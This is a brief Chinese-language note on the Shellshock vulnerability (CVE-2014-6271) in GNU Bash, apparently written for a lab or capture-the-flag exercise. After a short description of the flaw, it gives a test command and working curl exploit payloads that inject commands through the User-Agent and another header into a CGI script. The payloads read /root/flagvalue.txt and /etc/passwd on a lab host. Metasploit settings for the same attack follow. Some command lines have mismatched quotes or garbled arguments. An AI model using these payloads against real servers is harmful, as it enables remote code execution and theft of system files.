漏洞介绍:
CVE-2014-6271,该漏洞将导致远程攻击者在受影响的系统上执行任意代码。
漏洞概述:
GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。
使用如下命令来检查系统存在此漏洞:
env x=‘() { :;}; echo vulnerable’ bash -c “echo this is a test”
服务器端cgi文件
Hi文件
curl http://172.16.81.142/cgi-bin/hi -A ‘() { :;};a=/bin/cat /root/flagvalue.txt
’
OR
curl -H 'x: () { :;};a=`/bin/cat /etc/passwd`;echo $a''替换URL' -I
Metasploit用法
Set CMD /bin/cat /root/flagvalue.txt
Set RHOSTS 172.16.81.142
Set TARGETURI http://172.16.81.142/cgi-bin/hi
set cmd /bin/cat /usr/bin/tail -n 1 /root/config.txt